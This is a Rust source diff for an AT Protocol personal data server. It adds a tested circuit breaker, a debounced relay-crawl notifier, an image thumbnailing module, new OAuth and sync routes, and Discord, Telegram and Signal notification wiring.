pub fn get_algorithm_from_token(token: &str) -> Result<String, String> {
    let segments: Vec<&str> = token.split('.').collect();
    let header_b64 = match segments.as_slice() {
        [header, _claims, _signature] => *header,
        _ => return Err("Invalid token format".to_string()),
    };
    let header_bytes = URL_SAFE_NO_PAD
        .decode(header_b64)
        .map_err(|e| format!("Base64 decode failed: {}", e))?;
    let header: Header =
        serde_json::from_slice(&header_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
    Ok(header.alg)
}

307
src/circuit_breaker.rs Normal file
View File

@@ -0,0 +1,307 @@
use std::sync::atomic::{AtomicU32, AtomicU64, Ordering};
use std::sync::Arc;
use std::time::Duration;
use tokio::sync::RwLock;
/// The three classic circuit-breaker states.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum CircuitState {
    // Normal operation; calls flow through.
    Closed,
    // Too many failures; calls are rejected until the timeout elapses.
    Open,
    // Probing: calls are allowed so successes can close the circuit again.
    HalfOpen,
}
/// A tokio-friendly circuit breaker: opens after `failure_threshold`
/// failures, waits `timeout` before half-open probing, and closes after
/// `success_threshold` half-open successes.
pub struct CircuitBreaker {
    // Identifier used in log messages and CircuitOpenError.
    name: String,
    failure_threshold: u32,
    success_threshold: u32,
    timeout: Duration,
    // Current state, guarded by an async RwLock; counters below are atomics
    // so the common paths avoid the write lock.
    state: Arc<RwLock<CircuitState>>,
    failure_count: AtomicU32,
    success_count: AtomicU32,
    // Unix seconds of the failure that opened the circuit (0 = never).
    last_failure_time: AtomicU64,
}
impl CircuitBreaker {
    /// Create a breaker named `name` that opens after `failure_threshold`
    /// consecutive failures, closes after `success_threshold` half-open
    /// successes, and waits `timeout_secs` while open before probing.
    pub fn new(name: &str, failure_threshold: u32, success_threshold: u32, timeout_secs: u64) -> Self {
        Self {
            name: name.to_string(),
            failure_threshold,
            success_threshold,
            timeout: Duration::from_secs(timeout_secs),
            state: Arc::new(RwLock::new(CircuitState::Closed)),
            failure_count: AtomicU32::new(0),
            success_count: AtomicU32::new(0),
            last_failure_time: AtomicU64::new(0),
        }
    }
    /// Whether a call may proceed right now. While open, transitions to
    /// half-open (and permits the call) once `timeout` has elapsed since
    /// the last failure.
    pub async fn can_execute(&self) -> bool {
        let state = self.state.read().await;
        match *state {
            CircuitState::Closed => true,
            CircuitState::Open => {
                let last_failure = self.last_failure_time.load(Ordering::SeqCst);
                let now = std::time::SystemTime::now()
                    .duration_since(std::time::UNIX_EPOCH)
                    .unwrap()
                    .as_secs();
                if now - last_failure >= self.timeout.as_secs() {
                    // Upgrade read -> write lock; re-check the state because
                    // another task may have transitioned it in between.
                    drop(state);
                    let mut state = self.state.write().await;
                    if *state == CircuitState::Open {
                        *state = CircuitState::HalfOpen;
                        self.success_count.store(0, Ordering::SeqCst);
                        tracing::info!(circuit = %self.name, "Circuit breaker transitioning to half-open");
                        return true;
                    }
                }
                false
            }
            // Half-open admits probe calls to test recovery.
            CircuitState::HalfOpen => true,
        }
    }
    /// Record a successful call. In closed state this resets the failure
    /// streak; in half-open it counts toward closing the circuit.
    pub async fn record_success(&self) {
        let state = *self.state.read().await;
        match state {
            CircuitState::Closed => {
                self.failure_count.store(0, Ordering::SeqCst);
            }
            CircuitState::HalfOpen => {
                let count = self.success_count.fetch_add(1, Ordering::SeqCst) + 1;
                if count >= self.success_threshold {
                    let mut state = self.state.write().await;
                    *state = CircuitState::Closed;
                    self.failure_count.store(0, Ordering::SeqCst);
                    self.success_count.store(0, Ordering::SeqCst);
                    tracing::info!(circuit = %self.name, "Circuit breaker closed after successful recovery");
                }
            }
            // A success while fully open carries no information; ignore it.
            CircuitState::Open => {}
        }
    }
    /// Record a failed call. Opens the circuit when the closed-state streak
    /// reaches the threshold, or immediately on any half-open failure.
    pub async fn record_failure(&self) {
        let state = *self.state.read().await;
        match state {
            CircuitState::Closed => {
                let count = self.failure_count.fetch_add(1, Ordering::SeqCst) + 1;
                if count >= self.failure_threshold {
                    let mut state = self.state.write().await;
                    *state = CircuitState::Open;
                    let now = std::time::SystemTime::now()
                        .duration_since(std::time::UNIX_EPOCH)
                        .unwrap()
                        .as_secs();
                    self.last_failure_time.store(now, Ordering::SeqCst);
                    tracing::warn!(
                        circuit = %self.name,
                        failures = count,
                        "Circuit breaker opened after {} failures",
                        count
                    );
                }
            }
            CircuitState::HalfOpen => {
                // Any failure during probing reopens immediately and restarts
                // the timeout clock.
                let mut state = self.state.write().await;
                *state = CircuitState::Open;
                let now = std::time::SystemTime::now()
                    .duration_since(std::time::UNIX_EPOCH)
                    .unwrap()
                    .as_secs();
                self.last_failure_time.store(now, Ordering::SeqCst);
                self.success_count.store(0, Ordering::SeqCst);
                tracing::warn!(circuit = %self.name, "Circuit breaker reopened after failure in half-open state");
            }
            CircuitState::Open => {}
        }
    }
    /// Snapshot of the current state (for diagnostics/tests).
    pub async fn state(&self) -> CircuitState {
        *self.state.read().await
    }
    /// The breaker's configured name.
    pub fn name(&self) -> &str {
        &self.name
    }
}
/// Shared registry of the application's circuit breakers; cheap to clone
/// (each breaker is behind an Arc).
#[derive(Clone)]
pub struct CircuitBreakers {
    pub plc_directory: Arc<CircuitBreaker>,
    pub relay_notification: Arc<CircuitBreaker>,
}
// Default simply delegates to new(), keeping one source of truth for the
// threshold configuration.
impl Default for CircuitBreakers {
    fn default() -> Self {
        Self::new()
    }
}
impl CircuitBreakers {
    /// Build the standard breaker set:
    /// - PLC directory: opens after 5 failures, 60s timeout, 3 successes to close.
    /// - Relay notification: opens after 10 failures, 30s timeout, 5 successes to close.
    pub fn new() -> Self {
        Self {
            plc_directory: Arc::new(CircuitBreaker::new("plc_directory", 5, 3, 60)),
            relay_notification: Arc::new(CircuitBreaker::new("relay_notification", 10, 5, 30)),
        }
    }
}
/// Error returned when a call is rejected because its breaker is open.
#[derive(Debug)]
pub struct CircuitOpenError {
    // Name of the breaker that rejected the call, for diagnostics.
    pub circuit_name: String,
}
impl std::fmt::Display for CircuitOpenError {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        write!(f, "Circuit breaker '{}' is open", self.circuit_name)
    }
}
impl std::error::Error for CircuitOpenError {}
/// Run `operation` under `circuit`'s protection.
///
/// Rejects immediately with `CircuitOpen` when the breaker disallows
/// execution; otherwise runs the operation and reports its outcome back to
/// the breaker before propagating the result.
pub async fn with_circuit_breaker<T, E, F, Fut>(
    circuit: &CircuitBreaker,
    operation: F,
) -> Result<T, CircuitBreakerError<E>>
where
    F: FnOnce() -> Fut,
    Fut: std::future::Future<Output = Result<T, E>>,
{
    let allowed = circuit.can_execute().await;
    if !allowed {
        let rejection = CircuitOpenError {
            circuit_name: circuit.name().to_string(),
        };
        return Err(CircuitBreakerError::CircuitOpen(rejection));
    }
    match operation().await {
        Ok(value) => {
            circuit.record_success().await;
            Ok(value)
        }
        Err(failure) => {
            circuit.record_failure().await;
            Err(CircuitBreakerError::OperationFailed(failure))
        }
    }
}
/// Outcome of `with_circuit_breaker`: either the breaker refused the call,
/// or the wrapped operation itself failed with `E`.
#[derive(Debug)]
pub enum CircuitBreakerError<E> {
    CircuitOpen(CircuitOpenError),
    OperationFailed(E),
}
impl<E: std::fmt::Display> std::fmt::Display for CircuitBreakerError<E> {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        match self {
            CircuitBreakerError::CircuitOpen(e) => write!(f, "{}", e),
            CircuitBreakerError::OperationFailed(e) => write!(f, "Operation failed: {}", e),
        }
    }
}
// Expose the inner error as the source so error-chain reporting works.
impl<E: std::error::Error + 'static> std::error::Error for CircuitBreakerError<E> {
    fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
        match self {
            CircuitBreakerError::CircuitOpen(e) => Some(e),
            CircuitBreakerError::OperationFailed(e) => Some(e),
        }
    }
}
#[cfg(test)]
mod tests {
    use super::*;
    // A fresh breaker is closed and permits execution.
    #[tokio::test]
    async fn test_circuit_breaker_starts_closed() {
        let cb = CircuitBreaker::new("test", 3, 2, 10);
        assert_eq!(cb.state().await, CircuitState::Closed);
        assert!(cb.can_execute().await);
    }
    // Hitting the failure threshold (3) opens the circuit and blocks calls.
    #[tokio::test]
    async fn test_circuit_breaker_opens_after_failures() {
        let cb = CircuitBreaker::new("test", 3, 2, 10);
        cb.record_failure().await;
        assert_eq!(cb.state().await, CircuitState::Closed);
        cb.record_failure().await;
        assert_eq!(cb.state().await, CircuitState::Closed);
        cb.record_failure().await;
        assert_eq!(cb.state().await, CircuitState::Open);
        assert!(!cb.can_execute().await);
    }
    // A success in closed state resets the failure streak, so it takes a
    // full fresh streak of 3 failures to open.
    #[tokio::test]
    async fn test_circuit_breaker_success_resets_failures() {
        let cb = CircuitBreaker::new("test", 3, 2, 10);
        cb.record_failure().await;
        cb.record_failure().await;
        cb.record_success().await;
        cb.record_failure().await;
        cb.record_failure().await;
        assert_eq!(cb.state().await, CircuitState::Closed);
        cb.record_failure().await;
        assert_eq!(cb.state().await, CircuitState::Open);
    }
    // With a zero timeout the open circuit transitions to half-open on the
    // next can_execute(), then closes after 2 recorded successes.
    #[tokio::test]
    async fn test_circuit_breaker_half_open_closes_after_successes() {
        let cb = CircuitBreaker::new("test", 3, 2, 0);
        for _ in 0..3 {
            cb.record_failure().await;
        }
        assert_eq!(cb.state().await, CircuitState::Open);
        tokio::time::sleep(Duration::from_millis(100)).await;
        assert!(cb.can_execute().await);
        assert_eq!(cb.state().await, CircuitState::HalfOpen);
        cb.record_success().await;
        assert_eq!(cb.state().await, CircuitState::HalfOpen);
        cb.record_success().await;
        assert_eq!(cb.state().await, CircuitState::Closed);
    }
    // Any failure while half-open sends the circuit straight back to open.
    #[tokio::test]
    async fn test_circuit_breaker_half_open_reopens_on_failure() {
        let cb = CircuitBreaker::new("test", 3, 2, 0);
        for _ in 0..3 {
            cb.record_failure().await;
        }
        tokio::time::sleep(Duration::from_millis(100)).await;
        cb.can_execute().await;
        cb.record_failure().await;
        assert_eq!(cb.state().await, CircuitState::Open);
    }
    // with_circuit_breaker passes through Ok values and wraps Err values in
    // OperationFailed.
    #[tokio::test]
    async fn test_with_circuit_breaker_helper() {
        let cb = CircuitBreaker::new("test", 3, 2, 10);
        let result: Result<i32, CircuitBreakerError<std::io::Error>> =
            with_circuit_breaker(&cb, || async { Ok(42) }).await;
        assert!(result.is_ok());
        assert_eq!(result.unwrap(), 42);
        let result: Result<i32, CircuitBreakerError<&str>> =
            with_circuit_breaker(&cb, || async { Err("error") }).await;
        assert!(result.is_err());
    }
}

170
src/crawlers.rs Normal file
View File

@@ -0,0 +1,170 @@
use crate::circuit_breaker::CircuitBreaker;
use crate::sync::firehose::SequencedEvent;
use reqwest::Client;
use std::sync::atomic::{AtomicU64, Ordering};
use std::sync::Arc;
use std::time::Duration;
use tokio::sync::{broadcast, watch};
use tracing::{debug, error, info, warn};
// Debounce window: at most one requestCrawl burst every 20 minutes.
const NOTIFY_THRESHOLD_SECS: u64 = 20 * 60;
/// Notifies upstream relays (via `com.atproto.sync.requestCrawl`) that
/// this PDS has new data, with debouncing and optional circuit breaking.
pub struct Crawlers {
    // Our own hostname, sent in the requestCrawl payload.
    hostname: String,
    // Base URLs of the relays to notify.
    crawler_urls: Vec<String>,
    http_client: Client,
    // Unix seconds of the last notification burst (0 = never).
    last_notified: AtomicU64,
    // Optional breaker gating outbound notifications.
    circuit_breaker: Option<Arc<CircuitBreaker>>,
}
impl Crawlers {
    /// Creates a notifier that POSTs `com.atproto.sync.requestCrawl`
    /// with our `hostname` to each URL in `crawler_urls`.
    pub fn new(hostname: String, crawler_urls: Vec<String>) -> Self {
        Self {
            hostname,
            crawler_urls,
            // 30s request timeout; fall back to a default client rather
            // than aborting startup if the builder fails.
            http_client: Client::builder()
                .timeout(Duration::from_secs(30))
                .build()
                .unwrap_or_default(),
            last_notified: AtomicU64::new(0),
            circuit_breaker: None,
        }
    }

    /// Attaches a circuit breaker that gates (and records the outcome
    /// of) outbound crawler notifications.
    pub fn with_circuit_breaker(mut self, circuit_breaker: Arc<CircuitBreaker>) -> Self {
        self.circuit_breaker = Some(circuit_breaker);
        self
    }

    /// Builds from the `PDS_HOSTNAME` and comma-separated `CRAWLERS`
    /// environment variables; returns `None` when either is missing or
    /// the crawler list is empty.
    pub fn from_env() -> Option<Self> {
        let hostname = std::env::var("PDS_HOSTNAME").ok()?;
        let crawler_urls: Vec<String> = std::env::var("CRAWLERS")
            .unwrap_or_default()
            .split(',')
            .filter(|s| !s.is_empty())
            .map(|s| s.trim().to_string())
            .collect();
        if crawler_urls.is_empty() {
            return None;
        }
        Some(Self::new(hostname, crawler_urls))
    }

    /// Seconds since the Unix epoch (0 if the clock is before the epoch).
    fn unix_now_secs() -> u64 {
        std::time::SystemTime::now()
            .duration_since(std::time::UNIX_EPOCH)
            .unwrap_or_default()
            .as_secs()
    }

    /// Debounce check: true when at least `NOTIFY_THRESHOLD_SECS` have
    /// elapsed since the last notification.
    fn should_notify(&self) -> bool {
        let now = Self::unix_now_secs();
        let last = self.last_notified.load(Ordering::Relaxed);
        // saturating_sub: a backwards clock step would otherwise make
        // `now - last` underflow and panic in debug builds.
        now.saturating_sub(last) >= NOTIFY_THRESHOLD_SECS
    }

    fn mark_notified(&self) {
        self.last_notified.store(Self::unix_now_secs(), Ordering::Relaxed);
    }

    /// Fire-and-forget requestCrawl to every configured crawler.
    ///
    /// Skipped when debounced or when the circuit breaker is open. The
    /// HTTP calls run on spawned tasks, so this returns immediately;
    /// each task records success/failure on the breaker if present.
    pub async fn notify_of_update(&self) {
        if !self.should_notify() {
            debug!("Skipping crawler notification due to debounce");
            return;
        }
        if let Some(cb) = &self.circuit_breaker {
            if !cb.can_execute().await {
                debug!("Skipping crawler notification due to circuit breaker open");
                return;
            }
        }
        // Mark before the requests go out so concurrent callers debounce.
        self.mark_notified();
        let circuit_breaker = self.circuit_breaker.clone();
        for crawler_url in &self.crawler_urls {
            let url = format!(
                "{}/xrpc/com.atproto.sync.requestCrawl",
                crawler_url.trim_end_matches('/')
            );
            let hostname = self.hostname.clone();
            let client = self.http_client.clone();
            let cb = circuit_breaker.clone();
            tokio::spawn(async move {
                match client
                    .post(&url)
                    .json(&serde_json::json!({ "hostname": hostname }))
                    .send()
                    .await
                {
                    Ok(response) => {
                        if response.status().is_success() {
                            debug!(crawler = %url, "Successfully notified crawler");
                            if let Some(cb) = cb {
                                cb.record_success().await;
                            }
                        } else {
                            warn!(
                                crawler = %url,
                                status = %response.status(),
                                "Crawler notification returned non-success status"
                            );
                            if let Some(cb) = cb {
                                cb.record_failure().await;
                            }
                        }
                    }
                    Err(e) => {
                        warn!(crawler = %url, error = %e, "Failed to notify crawler");
                        if let Some(cb) = cb {
                            cb.record_failure().await;
                        }
                    }
                }
            });
        }
    }
}
/// Long-running task: watches the firehose broadcast channel and pings
/// the configured crawlers whenever a commit event arrives.
///
/// Exits when the firehose channel closes or `shutdown` flips to true.
/// If this receiver lags behind the broadcast, we still notify — a
/// missed batch of commits is exactly when a crawl is wanted.
pub async fn start_crawlers_service(
    crawlers: Arc<Crawlers>,
    mut firehose_rx: broadcast::Receiver<SequencedEvent>,
    mut shutdown: watch::Receiver<bool>,
) {
    info!(
        hostname = %crawlers.hostname,
        crawler_count = crawlers.crawler_urls.len(),
        crawlers = ?crawlers.crawler_urls,
        "Starting crawlers notification service"
    );
    loop {
        tokio::select! {
            result = firehose_rx.recv() => {
                match result {
                    Ok(event) => {
                        // Only repo commits are interesting to relays.
                        if event.event_type == "commit" {
                            crawlers.notify_of_update().await;
                        }
                    }
                    Err(broadcast::error::RecvError::Lagged(n)) => {
                        warn!(skipped = n, "Crawlers service lagged behind firehose");
                        crawlers.notify_of_update().await;
                    }
                    Err(broadcast::error::RecvError::Closed) => {
                        error!("Firehose channel closed, stopping crawlers service");
                        break;
                    }
                }
            }
            _ = shutdown.changed() => {
                if *shutdown.borrow() {
                    info!("Crawlers service shutting down");
                    break;
                }
            }
        }
    }
}

304
src/image/mod.rs Normal file
View File

@@ -0,0 +1,304 @@
use image::{DynamicImage, ImageFormat, ImageReader, imageops::FilterType};
use std::io::Cursor;
// Max edge length (px) for feed-sized thumbnails.
pub const THUMB_SIZE_FEED: u32 = 200;
// Max edge length (px) for full-view thumbnails.
pub const THUMB_SIZE_FULL: u32 = 1000;
/// A single encoded image plus the metadata callers need to store it.
#[derive(Debug, Clone)]
pub struct ProcessedImage {
    // Encoded bytes in the format indicated by `mime_type`.
    pub data: Vec<u8>,
    pub mime_type: String,
    pub width: u32,
    pub height: u32,
}
/// Output of [`ImageProcessor::process`]: the re-encoded original and,
/// when the source is large enough, downscaled thumbnails.
#[derive(Debug, Clone)]
pub struct ImageProcessingResult {
    pub original: ProcessedImage,
    // Present only when the source exceeds THUMB_SIZE_FEED.
    pub thumbnail_feed: Option<ProcessedImage>,
    // Present only when the source exceeds THUMB_SIZE_FULL.
    pub thumbnail_full: Option<ProcessedImage>,
}
/// Errors produced while validating, decoding, or encoding an image.
#[derive(Debug, thiserror::Error)]
pub enum ImageError {
    #[error("Failed to decode image: {0}")]
    DecodeError(String),
    #[error("Failed to encode image: {0}")]
    EncodeError(String),
    #[error("Unsupported image format: {0}")]
    UnsupportedFormat(String),
    // Pixel dimensions exceed the processor's configured maximum.
    #[error("Image too large: {width}x{height} exceeds maximum {max_dimension}")]
    TooLarge {
        width: u32,
        height: u32,
        max_dimension: u32,
    },
    // Raw byte size exceeds the processor's configured maximum.
    #[error("File too large: {size} bytes exceeds maximum {max_size} bytes")]
    FileTooLarge { size: usize, max_size: usize },
}
// Default upload cap for image files.
pub const DEFAULT_MAX_FILE_SIZE: usize = 10 * 1024 * 1024; // 10MB
/// Configurable image pipeline: validates size limits, decodes,
/// re-encodes, and optionally generates thumbnails.
pub struct ImageProcessor {
    // Maximum allowed width/height in pixels.
    max_dimension: u32,
    // Maximum allowed input size in bytes.
    max_file_size: usize,
    // Target encoding for all outputs.
    output_format: OutputFormat,
    // Whether process() emits feed/full thumbnails.
    generate_thumbnails: bool,
}
/// Encoding target for processed images.
#[derive(Debug, Clone, Copy)]
pub enum OutputFormat {
    WebP,
    Jpeg,
    Png,
    // NOTE(review): `Original` is currently encoded as PNG (see
    // encode_image), not the source format — confirm intent.
    Original,
}
impl Default for ImageProcessor {
fn default() -> Self {
Self {
max_dimension: 4096,
max_file_size: DEFAULT_MAX_FILE_SIZE,
output_format: OutputFormat::WebP,
generate_thumbnails: true,
}
}
}
impl ImageProcessor {
pub fn new() -> Self {
Self::default()
}
pub fn with_max_dimension(mut self, max: u32) -> Self {
self.max_dimension = max;
self
}
pub fn with_max_file_size(mut self, max: usize) -> Self {
self.max_file_size = max;
self
}
pub fn with_output_format(mut self, format: OutputFormat) -> Self {
self.output_format = format;
self
}
pub fn with_thumbnails(mut self, generate: bool) -> Self {
self.generate_thumbnails = generate;
self
}
pub fn process(&self, data: &[u8], mime_type: &str) -> Result<ImageProcessingResult, ImageError> {
if data.len() > self.max_file_size {
return Err(ImageError::FileTooLarge {
size: data.len(),
max_size: self.max_file_size,
});
}
let format = self.detect_format(mime_type, data)?;
let img = self.decode_image(data, format)?;
if img.width() > self.max_dimension || img.height() > self.max_dimension {
return Err(ImageError::TooLarge {
width: img.width(),
height: img.height(),
max_dimension: self.max_dimension,
});
}
let original = self.encode_image(&img)?;
let thumbnail_feed = if self.generate_thumbnails && (img.width() > THUMB_SIZE_FEED || img.height() > THUMB_SIZE_FEED) {
Some(self.generate_thumbnail(&img, THUMB_SIZE_FEED)?)
} else {
None
};
let thumbnail_full = if self.generate_thumbnails && (img.width() > THUMB_SIZE_FULL || img.height() > THUMB_SIZE_FULL) {
Some(self.generate_thumbnail(&img, THUMB_SIZE_FULL)?)
} else {
None
};
Ok(ImageProcessingResult {
original,
thumbnail_feed,
thumbnail_full,
})
}
fn detect_format(&self, mime_type: &str, data: &[u8]) -> Result<ImageFormat, ImageError> {
match mime_type.to_lowercase().as_str() {
"image/jpeg" | "image/jpg" => Ok(ImageFormat::Jpeg),
"image/png" => Ok(ImageFormat::Png),
"image/gif" => Ok(ImageFormat::Gif),
"image/webp" => Ok(ImageFormat::WebP),
_ => {
if let Ok(format) = image::guess_format(data) {
Ok(format)
} else {
Err(ImageError::UnsupportedFormat(mime_type.to_string()))
}
}
}
}
fn decode_image(&self, data: &[u8], format: ImageFormat) -> Result<DynamicImage, ImageError> {
let cursor = Cursor::new(data);
let reader = ImageReader::with_format(cursor, format);
reader
.decode()
.map_err(|e| ImageError::DecodeError(e.to_string()))
}
fn encode_image(&self, img: &DynamicImage) -> Result<ProcessedImage, ImageError> {
let (data, mime_type) = match self.output_format {
OutputFormat::WebP => {
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP)
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
(buf, "image/webp".to_string())
}
OutputFormat::Jpeg => {
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg)
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
(buf, "image/jpeg".to_string())
}
OutputFormat::Png => {
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png)
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
(buf, "image/png".to_string())
}
OutputFormat::Original => {
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png)
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
(buf, "image/png".to_string())
}
};
Ok(ProcessedImage {
data,
mime_type,
width: img.width(),
height: img.height(),
})
}
fn generate_thumbnail(&self, img: &DynamicImage, max_size: u32) -> Result<ProcessedImage, ImageError> {
let (orig_width, orig_height) = (img.width(), img.height());
let (new_width, new_height) = if orig_width > orig_height {
let ratio = max_size as f64 / orig_width as f64;
(max_size, (orig_height as f64 * ratio) as u32)
} else {
let ratio = max_size as f64 / orig_height as f64;
((orig_width as f64 * ratio) as u32, max_size)
};
let thumb = img.resize(new_width, new_height, FilterType::Lanczos3);
self.encode_image(&thumb)
}
pub fn is_supported_mime_type(mime_type: &str) -> bool {
matches!(
mime_type.to_lowercase().as_str(),
"image/jpeg" | "image/jpg" | "image/png" | "image/gif" | "image/webp"
)
}
pub fn strip_exif(data: &[u8]) -> Result<Vec<u8>, ImageError> {
let format = image::guess_format(data)
.map_err(|e| ImageError::DecodeError(e.to_string()))?;
let cursor = Cursor::new(data);
let img = ImageReader::with_format(cursor, format)
.decode()
.map_err(|e| ImageError::DecodeError(e.to_string()))?;
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), format)
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
Ok(buf)
}
}
#[cfg(test)]
mod tests {
    use super::*;
    // Builds a solid black PNG of the given size for test input.
    fn create_test_image(width: u32, height: u32) -> Vec<u8> {
        let img = DynamicImage::new_rgb8(width, height);
        let mut buf = Vec::new();
        img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
        buf
    }
    #[test]
    fn test_process_small_image() {
        // 100x100 is below both thumbnail thresholds — no thumbnails.
        let processor = ImageProcessor::new();
        let data = create_test_image(100, 100);
        let result = processor.process(&data, "image/png").unwrap();
        assert!(result.thumbnail_feed.is_none());
        assert!(result.thumbnail_full.is_none());
    }
    #[test]
    fn test_process_large_image_generates_thumbnails() {
        let processor = ImageProcessor::new();
        let data = create_test_image(2000, 1500);
        let result = processor.process(&data, "image/png").unwrap();
        assert!(result.thumbnail_feed.is_some());
        assert!(result.thumbnail_full.is_some());
        // Thumbnails must fit within their respective bounding boxes.
        let feed_thumb = result.thumbnail_feed.unwrap();
        assert!(feed_thumb.width <= THUMB_SIZE_FEED);
        assert!(feed_thumb.height <= THUMB_SIZE_FEED);
        let full_thumb = result.thumbnail_full.unwrap();
        assert!(full_thumb.width <= THUMB_SIZE_FULL);
        assert!(full_thumb.height <= THUMB_SIZE_FULL);
    }
    #[test]
    fn test_webp_conversion() {
        let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
        let data = create_test_image(500, 500);
        let result = processor.process(&data, "image/png").unwrap();
        assert_eq!(result.original.mime_type, "image/webp");
    }
    #[test]
    fn test_reject_too_large() {
        let processor = ImageProcessor::new().with_max_dimension(1000);
        let data = create_test_image(2000, 2000);
        let result = processor.process(&data, "image/png");
        assert!(matches!(result, Err(ImageError::TooLarge { .. })));
    }
    #[test]
    fn test_is_supported_mime_type() {
        assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
        assert!(ImageProcessor::is_supported_mime_type("image/png"));
        assert!(ImageProcessor::is_supported_mime_type("image/gif"));
        assert!(ImageProcessor::is_supported_mime_type("image/webp"));
        assert!(!ImageProcessor::is_supported_mime_type("image/bmp"));
        assert!(!ImageProcessor::is_supported_mime_type("text/plain"));
    }
}

View File

@@ -1,14 +1,19 @@
pub mod api;
pub mod auth;
pub mod circuit_breaker;
pub mod config;
pub mod crawlers;
pub mod image;
pub mod notifications;
pub mod oauth;
pub mod plc;
pub mod rate_limit;
pub mod repo;
pub mod state;
pub mod storage;
pub mod sync;
pub mod util;
pub mod validation;
use axum::{
Router,
@@ -20,6 +25,7 @@ pub fn app(state: AppState) -> Router {
Router::new()
.route("/health", get(api::server::health))
.route("/xrpc/_health", get(api::server::health))
.route("/robots.txt", get(api::server::robots_txt))
.route(
"/xrpc/com.atproto.server.describeServer",
get(api::server::describe_server),
@@ -140,6 +146,14 @@ pub fn app(state: AppState) -> Router {
"/xrpc/com.atproto.sync.subscribeRepos",
get(sync::subscribe_repos),
)
.route(
"/xrpc/com.atproto.sync.getHead",
get(sync::get_head),
)
.route(
"/xrpc/com.atproto.sync.getCheckout",
get(sync::get_checkout),
)
.route(
"/xrpc/com.atproto.moderation.createReport",
post(api::moderation::create_report),
@@ -338,9 +352,17 @@ pub fn app(state: AppState) -> Router {
)
.route("/oauth/authorize", get(oauth::endpoints::authorize_get))
.route("/oauth/authorize", post(oauth::endpoints::authorize_post))
.route("/oauth/authorize/select", post(oauth::endpoints::authorize_select))
.route("/oauth/authorize/2fa", get(oauth::endpoints::authorize_2fa_get))
.route("/oauth/authorize/2fa", post(oauth::endpoints::authorize_2fa_post))
.route("/oauth/authorize/deny", post(oauth::endpoints::authorize_deny))
.route("/oauth/token", post(oauth::endpoints::token_endpoint))
.route("/oauth/revoke", post(oauth::endpoints::revoke_token))
.route("/oauth/introspect", post(oauth::endpoints::introspect_token))
.route(
"/xrpc/com.atproto.temp.checkSignupQueue",
get(api::temp::check_signup_queue),
)
.route("/xrpc/{*method}", any(api::proxy::proxy_handler))
.with_state(state)
}

View File

@@ -1,7 +1,9 @@
use bspds::notifications::{EmailSender, NotificationService};
use bspds::crawlers::{Crawlers, start_crawlers_service};
use bspds::notifications::{DiscordSender, EmailSender, NotificationService, SignalSender, TelegramSender};
use bspds::state::AppState;
use std::net::SocketAddr;
use std::process::ExitCode;
use std::sync::Arc;
use tokio::sync::watch;
use tracing::{error, info, warn};
@@ -41,13 +43,6 @@ async fn run() -> Result<(), Box<dyn std::error::Error>> {
let state = AppState::new(pool.clone()).await;
bspds::sync::listener::start_sequencer_listener(state.clone()).await;
let relays = std::env::var("RELAYS")
.unwrap_or_default()
.split(',')
.filter(|s| !s.is_empty())
.map(|s| s.to_string())
.collect();
bspds::sync::relay_client::start_relay_clients(state.clone(), relays, None).await;
let (shutdown_tx, shutdown_rx) = watch::channel(false);
@@ -60,7 +55,34 @@ async fn run() -> Result<(), Box<dyn std::error::Error>> {
warn!("Email notifications disabled (MAIL_FROM_ADDRESS not set)");
}
let notification_handle = tokio::spawn(notification_service.run(shutdown_rx));
if let Some(discord_sender) = DiscordSender::from_env() {
info!("Discord notifications enabled");
notification_service = notification_service.register_sender(discord_sender);
}
if let Some(telegram_sender) = TelegramSender::from_env() {
info!("Telegram notifications enabled");
notification_service = notification_service.register_sender(telegram_sender);
}
if let Some(signal_sender) = SignalSender::from_env() {
info!("Signal notifications enabled");
notification_service = notification_service.register_sender(signal_sender);
}
let notification_handle = tokio::spawn(notification_service.run(shutdown_rx.clone()));
let crawlers_handle = if let Some(crawlers) = Crawlers::from_env() {
let crawlers = Arc::new(
crawlers.with_circuit_breaker(state.circuit_breakers.relay_notification.clone())
);
let firehose_rx = state.firehose_tx.subscribe();
info!("Crawlers notification service enabled");
Some(tokio::spawn(start_crawlers_service(crawlers, firehose_rx, shutdown_rx)))
} else {
warn!("Crawlers notification service disabled (PDS_HOSTNAME or CRAWLERS not set)");
None
};
let app = bspds::app(state);
@@ -75,6 +97,9 @@ async fn run() -> Result<(), Box<dyn std::error::Error>> {
.await;
notification_handle.await.ok();
if let Some(handle) = crawlers_handle {
handle.await.ok();
}
if let Err(e) = server_result {
return Err(format!("Server error: {}", e).into());

View File

@@ -2,11 +2,14 @@ mod sender;
mod service;
mod types;
pub use sender::{EmailSender, NotificationSender};
pub use sender::{
DiscordSender, EmailSender, NotificationSender, SendError, SignalSender, TelegramSender,
is_valid_phone_number, sanitize_header_value,
};
pub use service::{
enqueue_account_deletion, enqueue_email_update, enqueue_email_verification,
enqueue_notification, enqueue_password_reset, enqueue_plc_operation, enqueue_welcome,
NotificationService,
channel_display_name, enqueue_2fa_code, enqueue_account_deletion, enqueue_email_update,
enqueue_email_verification, enqueue_notification, enqueue_password_reset,
enqueue_plc_operation, enqueue_welcome, NotificationService,
};
pub use types::{
NewNotification, NotificationChannel, NotificationStatus, NotificationType, QueuedNotification,

View File

@@ -1,10 +1,17 @@
use async_trait::async_trait;
use reqwest::Client;
use serde_json::json;
use std::process::Stdio;
use std::time::Duration;
use tokio::io::AsyncWriteExt;
use tokio::process::Command;
use super::types::{NotificationChannel, QueuedNotification};
